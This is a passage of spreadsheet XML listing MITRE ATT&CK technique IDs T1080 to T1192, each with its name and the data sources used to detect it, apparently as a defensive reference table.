            <v>Multilayer Encryption</v>
          </cell>
          <cell r="C80" t="str">
            <v>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</v>
          </cell>
        </row>
        <row r="81">
          <cell r="A81" t="str">
            <v>T1080</v>
          </cell>
          <cell r="B81" t="str">
            <v>Taint Shared Content</v>
          </cell>
          <cell r="C81" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="82">
          <cell r="A82" t="str">
            <v>T1081</v>
          </cell>
          <cell r="B82" t="str">
            <v>Credentials in Files</v>
          </cell>
          <cell r="C82" t="str">
            <v>File monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="83">
          <cell r="A83" t="str">
            <v>T1082</v>
          </cell>
          <cell r="B83" t="str">
            <v>System Information Discovery</v>
          </cell>
          <cell r="C83" t="str">
            <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="84">
          <cell r="A84" t="str">
            <v>T1083</v>
          </cell>
          <cell r="B84" t="str">
            <v>File and Directory Discovery</v>
          </cell>
          <cell r="C84" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="85">
          <cell r="A85" t="str">
            <v>T1084</v>
          </cell>
          <cell r="B85" t="str">
            <v>Windows Management Instrumentation Event Subscription</v>
          </cell>
          <cell r="C85" t="str">
            <v>WMI Objects</v>
          </cell>
        </row>
        <row r="86">
          <cell r="A86" t="str">
            <v>T1085</v>
          </cell>
          <cell r="B86" t="str">
            <v>Rundll32</v>
          </cell>
          <cell r="C86" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
          </cell>
        </row>
        <row r="87">
          <cell r="A87" t="str">
            <v>T1086</v>
          </cell>
          <cell r="B87" t="str">
            <v>PowerShell</v>
          </cell>
          <cell r="C87" t="str">
            <v>PowerShell logs,Loaded DLLs,DLL monitoring,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="88">
          <cell r="A88" t="str">
            <v>T1087</v>
          </cell>
          <cell r="B88" t="str">
            <v>Account Discovery</v>
          </cell>
          <cell r="C88" t="str">
            <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="89">
          <cell r="A89" t="str">
            <v>T1088</v>
          </cell>
          <cell r="B89" t="str">
            <v>Bypass User Account Control</v>
          </cell>
          <cell r="C89" t="str">
            <v>System calls,Process monitoring,Authentication logs,Process command-line parameters</v>
          </cell>
        </row>
        <row r="90">
          <cell r="A90" t="str">
            <v>T1089</v>
          </cell>
          <cell r="B90" t="str">
            <v>Disabling Security Tools</v>
          </cell>
          <cell r="C90" t="str">
            <v>API monitoring,File monitoring,Services,Windows Registry,Process command-line parameters,Anti-virus</v>
          </cell>
        </row>
        <row r="91">
          <cell r="A91" t="str">
            <v>T1090</v>
          </cell>
          <cell r="B91" t="str">
            <v>Connection Proxy</v>
          </cell>
          <cell r="C91" t="str">
            <v>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
          </cell>
        </row>
        <row r="92">
          <cell r="A92" t="str">
            <v>T1091</v>
          </cell>
          <cell r="B92" t="str">
            <v>Replication Through Removable Media</v>
          </cell>
          <cell r="C92" t="str">
            <v>File monitoring,Data loss prevention</v>
          </cell>
        </row>
        <row r="93">
          <cell r="A93" t="str">
            <v>T1092</v>
          </cell>
          <cell r="B93" t="str">
            <v>Communication Through Removable Media</v>
          </cell>
          <cell r="C93" t="str">
            <v>File monitoring,Data loss prevention</v>
          </cell>
        </row>
        <row r="94">
          <cell r="A94" t="str">
            <v>T1093</v>
          </cell>
          <cell r="B94" t="str">
            <v>Process Hollowing</v>
          </cell>
          <cell r="C94" t="str">
            <v>Process monitoring,API monitoring</v>
          </cell>
        </row>
        <row r="95">
          <cell r="A95" t="str">
            <v>T1094</v>
          </cell>
          <cell r="B95" t="str">
            <v>Custom Command and Control Protocol</v>
          </cell>
          <cell r="C95" t="str">
            <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Host network interface,Network intrusion detection system,Network protocol analysis</v>
          </cell>
        </row>
        <row r="96">
          <cell r="A96" t="str">
            <v>T1095</v>
          </cell>
          <cell r="B96" t="str">
            <v>Standard Non-Application Layer Protocol</v>
          </cell>
          <cell r="C96" t="str">
            <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
          </cell>
        </row>
        <row r="97">
          <cell r="A97" t="str">
            <v>T1096</v>
          </cell>
          <cell r="B97" t="str">
            <v>NTFS File Attributes</v>
          </cell>
          <cell r="C97" t="str">
            <v>File monitoring,Kernel drivers,API monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="98">
          <cell r="A98" t="str">
            <v>T1097</v>
          </cell>
          <cell r="B98" t="str">
            <v>Pass the Ticket</v>
          </cell>
          <cell r="C98" t="str">
            <v>Authentication logs</v>
          </cell>
        </row>
        <row r="99">
          <cell r="A99" t="str">
            <v>T1098</v>
          </cell>
          <cell r="B99" t="str">
            <v>Account Manipulation</v>
          </cell>
          <cell r="C99" t="str">
            <v>Authentication logs,API monitoring,Windows event logs,Packet capture</v>
          </cell>
        </row>
        <row r="100">
          <cell r="A100" t="str">
            <v>T1099</v>
          </cell>
          <cell r="B100" t="str">
            <v>Timestomp</v>
          </cell>
          <cell r="C100" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="101">
          <cell r="A101" t="str">
            <v>T1100</v>
          </cell>
          <cell r="B101" t="str">
            <v>Web Shell</v>
          </cell>
          <cell r="C101" t="str">
            <v>Anti-virus,Authentication logs,File monitoring,Netflow/Enclave netflow,Process monitoring</v>
          </cell>
        </row>
        <row r="102">
          <cell r="A102" t="str">
            <v>T1101</v>
          </cell>
          <cell r="B102" t="str">
            <v>Security Support Provider</v>
          </cell>
          <cell r="C102" t="str">
            <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
          </cell>
        </row>
        <row r="103">
          <cell r="A103" t="str">
            <v>T1102</v>
          </cell>
          <cell r="B103" t="str">
            <v>Web Service</v>
          </cell>
          <cell r="C103" t="str">
            <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
          </cell>
        </row>
        <row r="104">
          <cell r="A104" t="str">
            <v>T1103</v>
          </cell>
          <cell r="B104" t="str">
            <v>AppInit DLLs</v>
          </cell>
          <cell r="C104" t="str">
            <v>Loaded DLLs,Process monitoring,Windows Registry</v>
          </cell>
        </row>
        <row r="105">
          <cell r="A105" t="str">
            <v>T1104</v>
          </cell>
          <cell r="B105" t="str">
            <v>Multi-Stage Channels</v>
          </cell>
          <cell r="C105" t="str">
            <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
          </cell>
        </row>
        <row r="106">
          <cell r="A106" t="str">
            <v>T1105</v>
          </cell>
          <cell r="B106" t="str">
            <v>Remote File Copy</v>
          </cell>
          <cell r="C106" t="str">
            <v>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
          </cell>
        </row>
        <row r="107">
          <cell r="A107" t="str">
            <v>T1106</v>
          </cell>
          <cell r="B107" t="str">
            <v>Execution through API</v>
          </cell>
          <cell r="C107" t="str">
            <v>API monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="108">
          <cell r="A108" t="str">
            <v>T1107</v>
          </cell>
          <cell r="B108" t="str">
            <v>File Deletion</v>
          </cell>
          <cell r="C108" t="str">
            <v>File monitoring,Process command-line parameters,Binary file metadata</v>
          </cell>
        </row>
        <row r="109">
          <cell r="A109" t="str">
            <v>T1108</v>
          </cell>
          <cell r="B109" t="str">
            <v>Redundant Access</v>
          </cell>
          <cell r="C109" t="str">
            <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
          </cell>
        </row>
        <row r="110">
          <cell r="A110" t="str">
            <v>T1109</v>
          </cell>
          <cell r="B110" t="str">
            <v>Component Firmware</v>
          </cell>
          <cell r="C110" t="str">
            <v>Disk forensics,API monitoring,Process monitoring,Component firmware</v>
          </cell>
        </row>
        <row r="111">
          <cell r="A111" t="str">
            <v>T1110</v>
          </cell>
          <cell r="B111" t="str">
            <v>Brute Force</v>
          </cell>
          <cell r="C111" t="str">
            <v>Office 365 account logs,Authentication logs</v>
          </cell>
        </row>
        <row r="112">
          <cell r="A112" t="str">
            <v>T1111</v>
          </cell>
          <cell r="B112" t="str">
            <v>Two-Factor Authentication Interception</v>
          </cell>
          <cell r="C112" t="str">
            <v>API monitoring,Process monitoring,Kernel drivers</v>
          </cell>
        </row>
        <row r="113">
          <cell r="A113" t="str">
            <v>T1112</v>
          </cell>
          <cell r="B113" t="str">
            <v>Modify Registry</v>
          </cell>
          <cell r="C113" t="str">
            <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
          </cell>
        </row>
        <row r="114">
          <cell r="A114" t="str">
            <v>T1113</v>
          </cell>
          <cell r="B114" t="str">
            <v>Screen Capture</v>
          </cell>
          <cell r="C114" t="str">
            <v>API monitoring,Process monitoring,File monitoring</v>
          </cell>
        </row>
        <row r="115">
          <cell r="A115" t="str">
            <v>T1114</v>
          </cell>
          <cell r="B115" t="str">
            <v>Email Collection</v>
          </cell>
          <cell r="C115" t="str">
            <v>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</v>
          </cell>
        </row>
        <row r="116">
          <cell r="A116" t="str">
            <v>T1115</v>
          </cell>
          <cell r="B116" t="str">
            <v>Clipboard Data</v>
          </cell>
          <cell r="C116" t="str">
            <v>API monitoring</v>
          </cell>
        </row>
        <row r="117">
          <cell r="A117" t="str">
            <v>T1116</v>
          </cell>
          <cell r="B117" t="str">
            <v>Code Signing</v>
          </cell>
          <cell r="C117" t="str">
            <v>Binary file metadata</v>
          </cell>
        </row>
        <row r="118">
          <cell r="A118" t="str">
            <v>T1117</v>
          </cell>
          <cell r="B118" t="str">
            <v>Regsvr32</v>
          </cell>
          <cell r="C118" t="str">
            <v>Loaded DLLs,Process monitoring,Windows Registry,Process command-line parameters</v>
          </cell>
        </row>
        <row r="119">
          <cell r="A119" t="str">
            <v>T1118</v>
          </cell>
          <cell r="B119" t="str">
            <v>InstallUtil</v>
          </cell>
          <cell r="C119" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="120">
          <cell r="A120" t="str">
            <v>T1119</v>
          </cell>
          <cell r="B120" t="str">
            <v>Automated Collection</v>
          </cell>
          <cell r="C120" t="str">
            <v>File monitoring,Data loss prevention,Process command-line parameters</v>
          </cell>
        </row>
        <row r="121">
          <cell r="A121" t="str">
            <v>T1120</v>
          </cell>
          <cell r="B121" t="str">
            <v>Peripheral Device Discovery</v>
          </cell>
          <cell r="C121" t="str">
            <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="122">
          <cell r="A122" t="str">
            <v>T1121</v>
          </cell>
          <cell r="B122" t="str">
            <v>Regsvcs/Regasm</v>
          </cell>
          <cell r="C122" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="123">
          <cell r="A123" t="str">
            <v>T1122</v>
          </cell>
          <cell r="B123" t="str">
            <v>Component Object Model Hijacking</v>
          </cell>
          <cell r="C123" t="str">
            <v>Windows Registry,DLL monitoring,Loaded DLLs</v>
          </cell>
        </row>
        <row r="124">
          <cell r="A124" t="str">
            <v>T1123</v>
          </cell>
          <cell r="B124" t="str">
            <v>Audio Capture</v>
          </cell>
          <cell r="C124" t="str">
            <v>API monitoring,Process monitoring,File monitoring</v>
          </cell>
        </row>
        <row r="125">
          <cell r="A125" t="str">
            <v>T1124</v>
          </cell>
          <cell r="B125" t="str">
            <v>System Time Discovery</v>
          </cell>
          <cell r="C125" t="str">
            <v>Process monitoring,Process command-line parameters,API monitoring</v>
          </cell>
        </row>
        <row r="126">
          <cell r="A126" t="str">
            <v>T1125</v>
          </cell>
          <cell r="B126" t="str">
            <v>Video Capture</v>
          </cell>
          <cell r="C126" t="str">
            <v>Process monitoring,File monitoring,API monitoring</v>
          </cell>
        </row>
        <row r="127">
          <cell r="A127" t="str">
            <v>T1126</v>
          </cell>
          <cell r="B127" t="str">
            <v>Network Share Connection Removal</v>
          </cell>
          <cell r="C127" t="str">
            <v>Process monitoring,Process command-line parameters,Packet capture,Authentication logs</v>
          </cell>
        </row>
        <row r="128">
          <cell r="A128" t="str">
            <v>T1127</v>
          </cell>
          <cell r="B128" t="str">
            <v>Trusted Developer Utilities</v>
          </cell>
          <cell r="C128" t="str">
            <v>Process monitoring</v>
          </cell>
        </row>
        <row r="129">
          <cell r="A129" t="str">
            <v>T1128</v>
          </cell>
          <cell r="B129" t="str">
            <v>Netsh Helper DLL</v>
          </cell>
          <cell r="C129" t="str">
            <v>DLL monitoring,Windows Registry,Process monitoring</v>
          </cell>
        </row>
        <row r="130">
          <cell r="A130" t="str">
            <v>T1129</v>
          </cell>
          <cell r="B130" t="str">
            <v>Execution through Module Load</v>
          </cell>
          <cell r="C130" t="str">
            <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="131">
          <cell r="A131" t="str">
            <v>T1130</v>
          </cell>
          <cell r="B131" t="str">
            <v>Install Root Certificate</v>
          </cell>
          <cell r="C131" t="str">
            <v>SSL/TLS inspection,Digital certificate logs</v>
          </cell>
        </row>
        <row r="132">
          <cell r="A132" t="str">
            <v>T1131</v>
          </cell>
          <cell r="B132" t="str">
            <v>Authentication Package</v>
          </cell>
          <cell r="C132" t="str">
            <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
          </cell>
        </row>
        <row r="133">
          <cell r="A133" t="str">
            <v>T1132</v>
          </cell>
          <cell r="B133" t="str">
            <v>Data Encoding</v>
          </cell>
          <cell r="C133" t="str">
            <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
          </cell>
        </row>
        <row r="134">
          <cell r="A134" t="str">
            <v>T1133</v>
          </cell>
          <cell r="B134" t="str">
            <v>External Remote Services</v>
          </cell>
          <cell r="C134" t="str">
            <v>Authentication logs</v>
          </cell>
        </row>
        <row r="135">
          <cell r="A135" t="str">
            <v>T1134</v>
          </cell>
          <cell r="B135" t="str">
            <v>Access Token Manipulation</v>
          </cell>
          <cell r="C135" t="str">
            <v>API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="136">
          <cell r="A136" t="str">
            <v>T1135</v>
          </cell>
          <cell r="B136" t="str">
            <v>Network Share Discovery</v>
          </cell>
          <cell r="C136" t="str">
            <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
          </cell>
        </row>
        <row r="137">
          <cell r="A137" t="str">
            <v>T1136</v>
          </cell>
          <cell r="B137" t="str">
            <v>Create Account</v>
          </cell>
          <cell r="C137" t="str">
            <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
          </cell>
        </row>
        <row r="138">
          <cell r="A138" t="str">
            <v>T1137</v>
          </cell>
          <cell r="B138" t="str">
            <v>Office Application Startup</v>
          </cell>
          <cell r="C138" t="str">
            <v>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
          </cell>
        </row>
        <row r="139">
          <cell r="A139" t="str">
            <v>T1138</v>
          </cell>
          <cell r="B139" t="str">
            <v>Application Shimming</v>
          </cell>
          <cell r="C139" t="str">
            <v>Loaded DLLs,System calls,Windows Registry,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="140">
          <cell r="A140" t="str">
            <v>T1139</v>
          </cell>
          <cell r="B140" t="str">
            <v>Bash History</v>
          </cell>
          <cell r="C140" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="141">
          <cell r="A141" t="str">
            <v>T1140</v>
          </cell>
          <cell r="B141" t="str">
            <v>Deobfuscate/Decode Files or Information</v>
          </cell>
          <cell r="C141" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="142">
          <cell r="A142" t="str">
            <v>T1141</v>
          </cell>
          <cell r="B142" t="str">
            <v>Input Prompt</v>
          </cell>
          <cell r="C142" t="str">
            <v>Process monitoring,Process command-line parameters,User interface,PowerShell logs</v>
          </cell>
        </row>
        <row r="143">
          <cell r="A143" t="str">
            <v>T1142</v>
          </cell>
          <cell r="B143" t="str">
            <v>Keychain</v>
          </cell>
          <cell r="C143" t="str">
            <v>System calls,Process monitoring</v>
          </cell>
        </row>
        <row r="144">
          <cell r="A144" t="str">
            <v>T1143</v>
          </cell>
          <cell r="B144" t="str">
            <v>Hidden Window</v>
          </cell>
          <cell r="C144" t="str">
            <v>Windows event logs,PowerShell logs,Process command-line parameters,Process monitoring,File monitoring</v>
          </cell>
        </row>
        <row r="145">
          <cell r="A145" t="str">
            <v>T1144</v>
          </cell>
          <cell r="B145" t="str">
            <v>Gatekeeper Bypass</v>
          </cell>
          <cell r="C145" t="str">
            <v>File monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="146">
          <cell r="A146" t="str">
            <v>T1145</v>
          </cell>
          <cell r="B146" t="str">
            <v>Private Keys</v>
          </cell>
          <cell r="C146" t="str">
            <v>File monitoring</v>
          </cell>
        </row>
        <row r="147">
          <cell r="A147" t="str">
            <v>T1146</v>
          </cell>
          <cell r="B147" t="str">
            <v>Clear Command History</v>
          </cell>
          <cell r="C147" t="str">
            <v>Authentication logs,File monitoring</v>
          </cell>
        </row>
        <row r="148">
          <cell r="A148" t="str">
            <v>T1147</v>
          </cell>
          <cell r="B148" t="str">
            <v>Hidden Users</v>
          </cell>
          <cell r="C148" t="str">
            <v>Authentication logs,File monitoring</v>
          </cell>
        </row>
        <row r="149">
          <cell r="A149" t="str">
            <v>T1148</v>
          </cell>
          <cell r="B149" t="str">
            <v>HISTCONTROL</v>
          </cell>
          <cell r="C149" t="str">
            <v>Process monitoring,Authentication logs,File monitoring,Environment variable</v>
          </cell>
        </row>
        <row r="150">
          <cell r="A150" t="str">
            <v>T1149</v>
          </cell>
          <cell r="B150" t="str">
            <v>LC_MAIN Hijacking</v>
          </cell>
          <cell r="C150" t="str">
            <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
          </cell>
        </row>
        <row r="151">
          <cell r="A151" t="str">
            <v>T1150</v>
          </cell>
          <cell r="B151" t="str">
            <v>Plist Modification</v>
          </cell>
          <cell r="C151" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="152">
          <cell r="A152" t="str">
            <v>T1151</v>
          </cell>
          <cell r="B152" t="str">
            <v>Space after Filename</v>
          </cell>
          <cell r="C152" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="153">
          <cell r="A153" t="str">
            <v>T1152</v>
          </cell>
          <cell r="B153" t="str">
            <v>Launchctl</v>
          </cell>
          <cell r="C153" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="154">
          <cell r="A154" t="str">
            <v>T1153</v>
          </cell>
          <cell r="B154" t="str">
            <v>Source</v>
          </cell>
          <cell r="C154" t="str">
            <v>Process monitoring,File monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="155">
          <cell r="A155" t="str">
            <v>T1154</v>
          </cell>
          <cell r="B155" t="str">
            <v>Trap</v>
          </cell>
          <cell r="C155" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="156">
          <cell r="A156" t="str">
            <v>T1155</v>
          </cell>
          <cell r="B156" t="str">
            <v>AppleScript</v>
          </cell>
          <cell r="C156" t="str">
            <v>API monitoring,System calls,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="157">
          <cell r="A157" t="str">
            <v>T1156</v>
          </cell>
          <cell r="B157" t="str">
            <v>.bash_profile and .bashrc</v>
          </cell>
          <cell r="C157" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters,Process use of network</v>
          </cell>
        </row>
        <row r="158">
          <cell r="A158" t="str">
            <v>T1157</v>
          </cell>
          <cell r="B158" t="str">
            <v>Dylib Hijacking</v>
          </cell>
          <cell r="C158" t="str">
            <v>File monitoring</v>
          </cell>
        </row>
        <row r="159">
          <cell r="A159" t="str">
            <v>T1158</v>
          </cell>
          <cell r="B159" t="str">
            <v>Hidden Files and Directories</v>
          </cell>
          <cell r="C159" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="160">
          <cell r="A160" t="str">
            <v>T1159</v>
          </cell>
          <cell r="B160" t="str">
            <v>Launch Agent</v>
          </cell>
          <cell r="C160" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="161">
          <cell r="A161" t="str">
            <v>T1160</v>
          </cell>
          <cell r="B161" t="str">
            <v>Launch Daemon</v>
          </cell>
          <cell r="C161" t="str">
            <v>Process monitoring,File monitoring</v>
          </cell>
        </row>
        <row r="162">
          <cell r="A162" t="str">
            <v>T1161</v>
          </cell>
          <cell r="B162" t="str">
            <v>LC_LOAD_DYLIB Addition</v>
          </cell>
          <cell r="C162" t="str">
            <v>Binary file metadata,Process monitoring,Process command-line parameters,File monitoring</v>
          </cell>
        </row>
        <row r="163">
          <cell r="A163" t="str">
            <v>T1162</v>
          </cell>
          <cell r="B163" t="str">
            <v>Login Item</v>
          </cell>
          <cell r="C163" t="str">
            <v>File monitoring,API monitoring</v>
          </cell>
        </row>
        <row r="164">
          <cell r="A164" t="str">
            <v>T1163</v>
          </cell>
          <cell r="B164" t="str">
            <v>Rc.common</v>
          </cell>
          <cell r="C164" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="165">
          <cell r="A165" t="str">
            <v>T1164</v>
          </cell>
          <cell r="B165" t="str">
            <v>Re-opened Applications</v>
          </cell>
          <cell r="C165" t="str">
            <v>File monitoring</v>
          </cell>
        </row>
        <row r="166">
          <cell r="A166" t="str">
            <v>T1165</v>
          </cell>
          <cell r="B166" t="str">
            <v>Startup Items</v>
          </cell>
          <cell r="C166" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="167">
          <cell r="A167" t="str">
            <v>T1166</v>
          </cell>
          <cell r="B167" t="str">
            <v>Setuid and Setgid</v>
          </cell>
          <cell r="C167" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="168">
          <cell r="A168" t="str">
            <v>T1167</v>
          </cell>
          <cell r="B168" t="str">
            <v>Securityd Memory</v>
          </cell>
          <cell r="C168" t="str">
            <v>Process monitoring</v>
          </cell>
        </row>
        <row r="169">
          <cell r="A169" t="str">
            <v>T1168</v>
          </cell>
          <cell r="B169" t="str">
            <v>Local Job Scheduling</v>
          </cell>
          <cell r="C169" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="170">
          <cell r="A170" t="str">
            <v>T1169</v>
          </cell>
          <cell r="B170" t="str">
            <v>Sudo</v>
          </cell>
          <cell r="C170" t="str">
            <v>File monitoring</v>
          </cell>
        </row>
        <row r="171">
          <cell r="A171" t="str">
            <v>T1170</v>
          </cell>
          <cell r="B171" t="str">
            <v>Mshta</v>
          </cell>
          <cell r="C171" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="172">
          <cell r="A172" t="str">
            <v>T1171</v>
          </cell>
          <cell r="B172" t="str">
            <v>LLMNR/NBT-NS Poisoning and Relay</v>
          </cell>
          <cell r="C172" t="str">
            <v>Windows event logs,Windows Registry,Packet capture,Netflow/Enclave netflow</v>
          </cell>
        </row>
        <row r="173">
          <cell r="A173" t="str">
            <v>T1172</v>
          </cell>
          <cell r="B173" t="str">
            <v>Domain Fronting</v>
          </cell>
          <cell r="C173" t="str">
            <v>SSL/TLS inspection,Packet capture</v>
          </cell>
        </row>
        <row r="174">
          <cell r="A174" t="str">
            <v>T1173</v>
          </cell>
          <cell r="B174" t="str">
            <v>Dynamic Data Exchange</v>
          </cell>
          <cell r="C174" t="str">
            <v>API monitoring,DLL monitoring,Process monitoring,Windows Registry,Windows event logs</v>
          </cell>
        </row>
        <row r="175">
          <cell r="A175" t="str">
            <v>T1174</v>
          </cell>
          <cell r="B175" t="str">
            <v>Password Filter DLL</v>
          </cell>
          <cell r="C175" t="str">
            <v>DLL monitoring,Process monitoring,Windows Registry</v>
          </cell>
        </row>
        <row r="176">
          <cell r="A176" t="str">
            <v>T1175</v>
          </cell>
          <cell r="B176" t="str">
            <v>Component Object Model and Distributed COM</v>
          </cell>
          <cell r="C176" t="str">
            <v>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
          </cell>
        </row>
        <row r="177">
          <cell r="A177" t="str">
            <v>T1176</v>
          </cell>
          <cell r="B177" t="str">
            <v>Browser Extensions</v>
          </cell>
          <cell r="C177" t="str">
            <v>Network protocol analysis,Packet capture,System calls,Process use of network,Process monitoring,Browser extensions</v>
          </cell>
        </row>
        <row r="178">
          <cell r="A178" t="str">
            <v>T1177</v>
          </cell>
          <cell r="B178" t="str">
            <v>LSASS Driver</v>
          </cell>
          <cell r="C178" t="str">
            <v>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process monitoring</v>
          </cell>
        </row>
        <row r="179">
          <cell r="A179" t="str">
            <v>T1178</v>
          </cell>
          <cell r="B179" t="str">
            <v>SID-History Injection</v>
          </cell>
          <cell r="C179" t="str">
            <v>API monitoring,Authentication logs,Windows event logs</v>
          </cell>
        </row>
        <row r="180">
          <cell r="A180" t="str">
            <v>T1179</v>
          </cell>
          <cell r="B180" t="str">
            <v>Hooking</v>
          </cell>
          <cell r="C180" t="str">
            <v>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process monitoring,Windows event logs</v>
          </cell>
        </row>
        <row r="181">
          <cell r="A181" t="str">
            <v>T1180</v>
          </cell>
          <cell r="B181" t="str">
            <v>Screensaver</v>
          </cell>
          <cell r="C181" t="str">
            <v>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
          </cell>
        </row>
        <row r="182">
          <cell r="A182" t="str">
            <v>T1181</v>
          </cell>
          <cell r="B182" t="str">
            <v>Extra Window Memory Injection</v>
          </cell>
          <cell r="C182" t="str">
            <v>API monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="183">
          <cell r="A183" t="str">
            <v>T1182</v>
          </cell>
          <cell r="B183" t="str">
            <v>AppCert DLLs</v>
          </cell>
          <cell r="C183" t="str">
            <v>Loaded DLLs,Process monitoring,Windows Registry</v>
          </cell>
        </row>
        <row r="184">
          <cell r="A184" t="str">
            <v>T1183</v>
          </cell>
          <cell r="B184" t="str">
            <v>Image File Execution Options Injection</v>
          </cell>
          <cell r="C184" t="str">
            <v>Process monitoring,Windows Registry,Windows event logs</v>
          </cell>
        </row>
        <row r="185">
          <cell r="A185" t="str">
            <v>T1184</v>
          </cell>
          <cell r="B185" t="str">
            <v>SSH Hijacking</v>
          </cell>
          <cell r="C185" t="str">
            <v>Authentication logs</v>
          </cell>
        </row>
        <row r="186">
          <cell r="A186" t="str">
            <v>T1185</v>
          </cell>
          <cell r="B186" t="str">
            <v>Man in the Browser</v>
          </cell>
          <cell r="C186" t="str">
            <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
          </cell>
        </row>
        <row r="187">
          <cell r="A187" t="str">
            <v>T1186</v>
          </cell>
          <cell r="B187" t="str">
            <v>Process Doppelgänging</v>
          </cell>
          <cell r="C187" t="str">
            <v>API monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="188">
          <cell r="A188" t="str">
            <v>T1187</v>
          </cell>
          <cell r="B188" t="str">
            <v>Forced Authentication</v>
          </cell>
          <cell r="C188" t="str">
            <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
          </cell>
        </row>
        <row r="189">
          <cell r="A189" t="str">
            <v>T1188</v>
          </cell>
          <cell r="B189" t="str">
            <v>Multi-hop Proxy</v>
          </cell>
          <cell r="C189" t="str">
            <v>Network protocol analysis,Netflow/Enclave netflow</v>
          </cell>
        </row>
        <row r="190">
          <cell r="A190" t="str">
            <v>T1189</v>
          </cell>
          <cell r="B190" t="str">
            <v>Drive-by Compromise</v>
          </cell>
          <cell r="C190" t="str">
            <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
          </cell>
        </row>
        <row r="191">
          <cell r="A191" t="str">
            <v>T1190</v>
          </cell>
          <cell r="B191" t="str">
            <v>Exploit Public-Facing Application</v>
          </cell>
          <cell r="C191" t="str">
            <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
          </cell>
        </row>
        <row r="192">
          <cell r="A192" t="str">
            <v>T1191</v>
          </cell>
          <cell r="B192" t="str">
            <v>CMSTP</v>
          </cell>
          <cell r="C192" t="str">
            <v>Process monitoring,Process command-line parameters,Process use of network,Windows event logs</v>
          </cell>
        </row>
        <row r="193">
          <cell r="A193" t="str">
            <v>T1192</v>
          </cell>
          <cell r="B193" t="str">
            <v>Spearphishing Link</v>
          </cell>
          <cell r="C193" t="str">
            <v>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</v>
          </cell>
        </row>
